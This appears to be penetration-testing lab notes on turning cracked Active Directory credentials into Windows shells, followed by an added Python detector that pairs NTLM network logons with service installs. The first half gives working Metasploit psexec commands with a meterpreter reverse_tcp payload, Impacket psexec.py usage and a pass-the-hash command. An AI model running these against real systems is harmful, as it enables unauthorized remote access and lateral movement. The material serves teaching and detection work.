We got the hashes and cracked them. Now what?

There are 2 ways to gain a shell with the credentials.

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.10.10.161
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1

Exploited it and I successfully got a shell.


psexec.py MARVEL/[email protected]
# enter the password and you'll get a shell


We can even get a shell as the Admin account by using its hash.

psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc


Some other scripts to use as a backup if the ones above don't work.

  1. wmiexec.py
  2. smbexec.py
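
From the defender's side, PsExec-style execution with a password or a hash leaves a recognizable trail on the target: a network logon (Security event 4624, LogonType 3, typically NTLM) followed by a service installation (System event 7045). The following is an added example, not part of the original notes, that correlates the two; the events, host names, source address and 60-second window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original notes). Field names follow
# the Windows 4624 (logon) and 7045 (service installed) event schemas.
EVENTS = [
    {"time": "2024-01-10T09:00:00", "host": "TARGET-01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "fcastle",
     "IpAddress": "10.10.10.20"},
    {"time": "2024-01-10T09:15:02", "host": "TARGET-01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "IpAddress": "10.10.10.50"},
    {"time": "2024-01-10T09:15:04", "host": "TARGET-01", "id": 7045,
     "ServiceName": "kXzQ", "ImagePath": "%systemroot%\\aBcDeFgH.exe"},
    # Routine software install on another host, with no preceding NTLM logon.
    {"time": "2024-01-10T11:30:00", "host": "FS-01", "id": 7045,
     "ServiceName": "BackupAgent", "ImagePath": "C:\\Program Files\\Backup\\agent.exe"},
]

WINDOW = timedelta(seconds=60)  # assumed correlation window; tune per environment


def find_remote_service_exec(events, window=WINDOW):
    """Flag a service install that follows an NTLM network logon on the same host."""
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    ntlm_logons = {}  # host -> NTLM type-3 logons seen so far
    alerts = []
    for ev in ordered:
        when = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 4624 and ev.get("LogonType") == 3
                and ev.get("AuthenticationPackageName") == "NTLM"):
            ntlm_logons.setdefault(ev["host"], []).append(ev)
        elif ev["id"] == 7045:
            for logon in ntlm_logons.get(ev["host"], []):
                gap = when - datetime.fromisoformat(logon["time"])
                if gap <= window:  # gap is never negative: events are time-ordered
                    alerts.append({"host": ev["host"],
                                   "user": logon["TargetUserName"],
                                   "source_ip": logon["IpAddress"],
                                   "service": ev["ServiceName"],
                                   "image_path": ev["ImagePath"],
                                   "gap_seconds": gap.total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_exec(EVENTS):
        print(alert)
```
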